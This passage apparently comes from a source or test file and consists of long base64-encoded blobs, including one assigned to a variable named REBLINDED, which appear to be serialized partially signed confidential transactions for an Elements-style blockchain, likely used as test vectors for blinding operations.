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"
REBLINDED = "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